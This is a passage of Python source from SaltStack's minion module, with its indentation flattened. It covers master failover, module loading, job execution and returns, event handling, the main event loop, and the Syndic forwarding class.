msg = ('Failed to evaluate master address from '
'module \'{0}\''.format(opts['master']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(master_mod))
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
shuffle(opts['master'])
elif isinstance(opts['master'], str):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = list(opts['master'])
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
log.info('Removing possibly failed master {0} from list of'
' masters'.format(opts['master']))
# create new list of master with the possibly failed one removed
opts['master'] = [x for x in opts['master_list'] if opts['master'] != x]
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
local_masters = copy.copy(opts['master'])
for master in local_masters:
opts['master'] = master
opts.update(resolve_dns(opts))
super(Minion, self).__init__(opts) # TODO: only run init once?? This will run once per attempt
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = local_masters
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts,
timeout=timeout,
safe=safe,
io_loop=self.io_loop,
)
yield pub_channel.connect()
conn = True
break
except SaltClientError:
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
self.connected = False
msg = ('No master could be reached or all masters denied '
'the minions connection attempt.')
log.error(msg)
else:
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
opts.update(resolve_dns(opts))
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts,
timeout=timeout,
safe=safe,
io_loop=self.io_loop,
)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _process_beacons(self):
'''
Process each beacon and send events if appropriate
'''
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
except Exception as exc:
log.critical('Beacon processing errored: {0}. No beacons will be procssed.'.format(traceback.format_exc(exc)))
beacons = None
if beacons:
self._fire_master(events=beacons)
for beacon in beacons:
serialized_data = salt.utils.dicttrim.trim_dict(
self.serial.dumps(beacon['data']),
self.opts.get('max_event_size', 1048576),
is_msgpacked=True,
)
log.debug('Sending event - data = {0}'.format(beacon['data']))
event = '{0}{1}{2}'.format(
beacon['tag'],
salt.utils.event.TAGEND,
serialized_data,
)
self.event_publisher.handle_publish([event])
def _load_modules(self, force_refresh=False, notify=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh)
self.utils = salt.loader.utils(self.opts)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
return functions, returners, errors
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
channel = salt.transport.Channel.factory(self.opts)
try:
result = channel.send(load, timeout=timeout)
return True
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
target = Minion._thread_multi_return
else:
target = Minion._thread_return
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
if self.opts['multiprocessing']:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
process = multiprocessing.Process(
target=target, args=(instance, self.opts, data)
)
else:
process = threading.Thread(
target=target,
args=(instance, self.opts, data),
name=data['jid']
)
process.start()
if not sys.platform.startswith('win'):
process.join()
else:
self.win_proc.append(process)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors = (
minion_instance._load_modules()
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing']:
salt.utils.daemonize_if(opts)
salt.utils.appendproctitle(data['jid'])
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
func = minion_instance.functions[data['fun']]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
if opts.get('sudo_user', ''):
sudo_runas = opts.get('sudo_user')
if 'sudo.salt_call' in minion_instance.functions:
return_data = minion_instance.functions['sudo.salt_call'](
sudo_runas,
data['fun'],
*args,
**kwargs)
else:
return_data = func(*args, **kwargs)
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for {0!r} not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in {0!r} had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing {0!r}: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing {0!r}: {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments: {0}\n{1}'.format(exc, func.__doc__)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: {0!r}'.format(minion_instance.function_errors[mod_name])
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
minion_instance._return_pub(ret)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
salt.utils.appendproctitle(data['jid'])
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
minion_instance._return_pub(ret)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
channel = salt.transport.Channel.factory(self.opts)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
fn_ = os.path.join(
self.opts['cachedir'],
'minion_jobs',
load['jid'],
'return.p')
jdir = os.path.dirname(fn_)
if not os.path.isdir(jdir):
os.makedirs(jdir)
salt.utils.fopen(fn_, 'w+b').write(self.serial.dumps(ret))
try:
ret_val = channel.send(load, timeout=timeout)
except SaltReqTimeoutError:
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warn(msg)
return ''
log.trace('ret_val = {0}'.format(ret_val))
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
self.functions, self.returners, _ = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, package):
'''
Refresh the functions and returners.
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
if func == 'delete':
self.schedule.delete_job(name)
elif func == 'add':
self.schedule.add_job(schedule)
elif func == 'modify':
self.schedule.modify_job(name, schedule, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, where)
elif func == 'run_job':
self.schedule.run_job(name, where)
elif func == 'disable_job':
self.schedule.disable_job(name, where)
elif func == 'reload':
self.schedule.reload(schedule)
def manage_beacons(self, package):
'''
Manage Beacons
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons()
def environ_setenv(self, package):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def clean_die(self, signum, frame):
'''
Python does not handle the SIGTERM cleanly, if it is signaled exit
the minion process cleanly
'''
self._running = False
exit(0)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, package):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
load = salt.utils.event.SaltEvent.unpack(package)[1]
load['tok'] = self.tok
ret = channel.send(load)
return ret
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
log.debug('Handling event {0!r}'.format(package))
if package.startswith('module_refresh'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
self.module_refresh(notify=data.get('notify', False))
elif package.startswith('pillar_refresh'):
yield self.pillar_refresh()
elif package.startswith('manage_schedule'):
self.manage_schedule(package)
elif package.startswith('manage_beacons'):
self.manage_beacons(package)
elif package.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif package.startswith('environ_setenv'):
self.environ_setenv(package)
elif package.startswith('_minion_mine'):
self._mine_send(package)
elif package.startswith('fire_master'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif package.startswith('__master_disconnected'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
# if the master disconnect event is for a different master, raise an exception
if data['master'] != self.opts['master']:
raise Exception()
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
# if eval_master finds a new master for us, self.connected
# will be True again on successfull master authentication
self.opts['master'] = self.eval_master(opts=self.opts,
failed=True)
if self.connected:
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
del self.pub_channel
self._connect_master_future = self.connect_master()
self.block_until_connected() # TODO: remove
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('__master_connected'):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('_salt_error'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
# Properly exit if a SIGTERM is signalled
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Minion {0!r} trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
self.handle_event,
io_loop=self.io_loop,
)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = self.opts['loop_interval']
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
self.periodic_callbacks = {}
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0:
def ping_master():
self._fire_master('ping', 'minion_ping')
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
self.periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
def handle_beacons():
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons:
self._fire_master(events=beacons)
self.periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
self.periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(self.periodic_callbacks):
periodic_cb.start()
# add handler to subscriber
self.pub_channel.on_recv(self._handle_payload)
if start:
self.io_loop.start()
def _handle_payload(self, payload):
if payload is not None and self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndic don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
try:
# Send out the publication
self.local.pub(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
**kwargs)
except Exception as exc:
log.warning('Unable to forward pub data: {0}'.format(exc))
def _fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start'
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
)
# Syndic Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Syndic {0!r} trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Send an event to the master that the minion is live
self._fire_master_syndic_start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
if start:
self.io_loop.start()
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None:
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag']))
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._fire_master(events=self.raw_events,
pretag=tagify(self.opts['id'], base='syndic'),
)
for jid in self.jids:
self._return_pub(self.jids[jid], '_syndic_return')
self._reset_event_aggregation()
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: consolidate syndic classes together?
# need a way of knowing if the syndic connection is busted
class MultiSyndic(MinionBase):
'''
